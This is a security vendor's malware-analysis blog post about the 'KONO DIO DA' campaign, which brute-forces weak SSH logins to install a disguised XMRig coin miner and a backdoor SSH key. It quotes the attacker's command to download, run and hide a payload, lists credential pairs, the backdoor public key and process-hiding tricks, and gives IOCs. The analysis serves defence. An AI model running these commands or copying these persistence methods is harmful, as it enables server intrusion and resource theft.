AhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022: they involve the usage of malware developed with Shell Script Compiler (SHC) when installing the XMRig, as well as the creation of a backdoor SSH account.
When looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS Bot or CoinMiner. DDoS Bot has been covered here in the ASEC Blog before through the attack cases where ShellBot [1] and ChinaZ DDoS Bot [2] were installed respectively. The installation of XMRig CoinMiner was covered in tandem with the SHC malware [3].
This blog post will cover one of the various attack cases where CoinMiner is installed. The main features of this attack campaign include its relatively recent start, use of SHC, and the inclusion of a personalized message that says “KONO DIO DA” from the threat actor.
1. Dictionary Attack Against Linux SSH Servers
Poorly managed services are one of the prime examples of attack vectors used to target server environments such as Linux servers. The Secure Shell (SSH) service is installed in most Linux server environments, can easily be used for attacks, and is prone to poor management. SSH allows administrators to log in remotely and control the system, but they must log into the user account registered to the system to do so.
If simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force or a dictionary attack, allowing them to execute malicious commands. When Linux SSH servers that are poorly managed are attacked, the main attack method involves searching externally exposed SSH servers through port scanning and using the known account credentials to perform dictionary attacks and log in. Malware is then downloaded afterward.
The following is a list of IDs/PWs used in those attacks.
| ID | PW | Attacker |
|---|---|---|
| root | . | 23.224.232[.]68 |
| root | … | 23.224.232[.]68 |
| root | P@ssw0rd | 23.224.232[.]68 |
| admin | password1! | 23.224.232[.]68 |
| web | 123456 | 23.224.232[.]68 |
| tomcat | tomcat | 23.224.232[.]68 |
| centos | Huawei@123 | 23.224.232[.]68 |
| oracle | Huawei@123 | 23.224.232[.]68 |
2. Cases of KONO DIO DA Attacks – Latest
The threat actor used the commands below to download and execute malware after successfully logging in. “uname -a” and “nproc” are commands that output the system information. It is assumed that these are used so that the threat actor can check which systems have a CoinMiner installed on them later on. There are also commands that delete the history of these commands after the malware has been executed.
# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; chmod +x am ; ./am ; history -c ; rm -rf ~/.bash_history
The downloaded “am” file is malware that has been developed with SHC, and functions as a downloader. The fact that it was developed with SHC means that the original malware is actually a Bash script that has been converted into the ELF format. Details regarding SHC have been covered previously in the blog post below.
“am” is a simple downloader that downloads and executes “nw”, while “nw” is also a downloader that ultimately downloads and executes additional malware. The “nw” Bash script forcefully terminates and deletes the CoinMiner it used in the past along with its other malware before downloading and executing a compressed file with the XMRig and Bash script malware.
The compressed file includes the XMRig “dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only”, the configuration file “config.json”, and 3 Bash script malware.
“nw” executes the “start” Bash script inside the compressed file, and “start” is responsible for the function that executes the “admin” Bash script. “admin” is responsible for registering the cron task, which executes the “root.sh” Bash script and “root.sh” every minute.
“root.sh” executes XMRig “dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only” that exists in the same path, before reading and using the configuration information required for mining from “config.json” which also exists in the same path. XMRig is executed under the disguised name of a normal process, “dbus-daemon”. Not only does it use its process name, but the arguments used upon execution are also mimicked, making it difficult for ordinary users to notice that a CoinMiner is currently running.
| Mining Pool | Wallet | Password |
|---|---|---|
| xmr.doi-2020[.]net:14444 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ.worker01/bolus.eu@gmail.com | worker01 |
| val.doi-2020[.]net:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
| 142.202.242[.]45:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
| pool.hashvault[.]pro:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
| AS.doi-2020[.]net:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x |
| 139.99.123[.]196:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x |
| pool.supportxmr[.]com:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x |
3. Cases of KONO DIA DA Attacks – Past
Looking at past cases, it is apparent that the malware used in recent attacks has fewer features than before. The initially installed file cannot be confirmed, but “hoze” is a Bash script that performs the same functions as “nw”. “hoze” decompresses the downloaded compressed file and executes an ELF file named “init0”. “init0” is a malware strain that provides various additional features such as installing the XMRig CoinMiner.
Unlike the recently confirmed attacks, the “KONO DIO DA” threat actor used a wider variety of features during their past attacks. The feature to maintain persistence was one of the main features they used. A “key” file existed in the compressed file.
The following public SSH key was included in the “key” file. “init0” removes the existing “~/.ssh/authorized_keys” file and copies the “key” file that was inside the compressed file to that directory.
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key |
When logging into a remote SSH server, it is possible to log in without an ID and PW by generating public and private keys. To accomplish this, a user can generate public and private SSH keys and then register their public key to their desired server. Afterward, the private key can be used to log into the client. In this case, the threat actor creates and registers their public key, which is the “key” file, to the “~/.ssh/authorized_keys” path. This allows them to use their private key later to log into the infected system.
Besides this, the threat actor can use the usermod command to add an account called “cheeki”. If the infected system has an account called “root”, “dolphinscheduler”, “admin”, “es”, or “hadoop”, then the password is changed by the threat actor. This process is a persistence maintenance technique that creates a backdoor account on an infected system, allowing the threat actor to log in at a later date.
The “uninstall.sh” Bash script is responsible for removing the Ali cloud shield (Ann Knight) of the security service Alibaba Cloud. kinsing is a malware strain that is primarily used to remove Aegis. kinsing installs a Bash script that is capable of removing not only Aegis, but Tencent QCloud Monitor as well. It is also capable of disabling SELinux and AppArmor.
Contrary to its name, “init.sh” is an SHC ELF file, and its simple structure is shown below. It is responsible for executing the CoinMiner and hiding the process. To do this, it creates the “/var/tmp/…” directory and uses the mount command to bind the directory to the /proc file system on the PID of the miner process. This is one of the previously known methods used to conceal processes. The threat actor uses this simple command instead of a rootkit to conceal the CoinMiner’s process.
The aforementioned scripts and SHC ELF files perform supplementary roles, while “secure” is responsible for the main features. “secure” is an ELF file built with SHC, and is responsible for executing XMRig CoinMiner, installing the latest XMRig, and registering itself in the cron task. Therefore, as it is executed regularly through the cron task, if XMRig does not exist on the system, the latest version is downloaded to start mining for cryptocurrency on the infected system.
When looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS Bot or CoinMiner. Most CoinMiner attack cases have no notable characteristics, as XMRig is simply installed to mine Monero Coins. However, the “KONO DIO DA” threat actors use additional malware and various analysis disruption techniques in addition to installing XMRig, and these attacks were confirmed relatively recently.
| Mining Pool | Wallet | Password |
|---|---|---|
| 5.9.157[.]2:10380 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x |
| 2.58.149[.]237:2007 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x |
4. Conclusion
Attack campaigns where a CoinMiner is installed on poorly managed Linux SSH servers have been occurring persistently since the past. The “KONO DIO DA” attack campaign covered here maintains its persistence by registering a backdoor SSH account in addition to installing the XMRig CoinMiner. If CoinMiner is installed, system resources are used to mine Monero Coins for the threat attack, and the threat actor can later log in through the backdoor SSH account to either install additional malware, steal information from the system, or perform various other malicious behaviors.
Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware infection in advance.
File Detection
– CoinMiner/Text.Config (2023.04.24.02)
– Downloader/Linux.Agent.1011056 (2023.04.24.02)
– Downloader/Linux.Agent.11344 (2023.04.24.02)
– Downloader/Shell.Agent.SC187868 (2023.04.24.02)
– Downloader/Shell.Agent.SC187872 (2023.04.24.02)
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Trojan/Linux.Agent.1010416 (2023.04.24.02)
– Trojan/Linux.Hider.1008280 (2023.04.24.02)
– Trojan/Shell.Agent.SC187867 (2023.04.24.02)
– Trojan/Shell.Agent.SC187876 (2023.04.24.02)
– Trojan/Shell.Runner.SC187869 (2023.04.24.02)
– Trojan/Shell.Runner.SC187871 (2023.04.24.02)
IOC
MD5
– ea30afd4f65f8866bebcaf92168f3241: Latest version of the downloader (am)
– 1192697ed3d2302bec3ee828c154e300: Latest version of the downloader Bash script (nw)
– 1db93cb95e409769561efb66e4fd5c72: Bash script (start)
– 6e9001516053770f6dd645954240bced: Bash script (admin)
– a978aec11a072855e2cfba593160886e: Bash script (root.sh)
– 4f1661d873cef8a3fa3ca34080816e87: XMRig CoinMiner(dbus-daemon –system –address=systemd_ –nofork —nopidfile –systemd-activation –syslog-only)
– 20ac8a45d129e3ce3444494d9672692c: XMRig Configuration File (config.json)
– 5c1ad4a8335fc406040a070b2be661ff: Past version of the downloader Bash script (hoze)
– 90948ae9f7d167d4016c7a56477a67b3: Past version of the downloader (init0)
– 1932d2e4081f6dd5c8b32d29b1ab5caf: Bash script (init.sh)
– e4cc1a7f992909e8509520fdd6c9a3f7: Bash script (uninstall.sh)
– bb497b86c26893e10432781c6550e5fc: Bash script (secure)
– 254784ca05bdd3928d7889d0ea3195ab: XMRig CoinMiner (xri)
– 5f89f90efd1568618e72bb30b8e44fce: XMRig Configuration File (config.json)
– 5aa60757665510b2c8e9bb924c2b40ef: XMRig Configuration File (config32.json)
Download URLs
– hxxp://46.41.150[.]129/.bo/am (Dictionary attack)
– hxxp://46.41.150[.]129/.bo/nw: Latest version of the downloader (am)
– hxxp://46.41.150[.]129/.js/new-xmrig.tgz: Latest version of the downloader (w)
– hxxp://2.58.149[.]237:6972/hoze: Past version of the downloader
– hxxp://2.58.149[.]237:6972/xri2.tar: Past version of the CoinMiner (hoze)
– hxxp://141.95.19[.]91:8080/xri/xri: Downloads XMRig CoinMiner
– hxxp://141.95.19[.]91:8080/xri/config.json: Downloads XMRig configuration file
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/51908/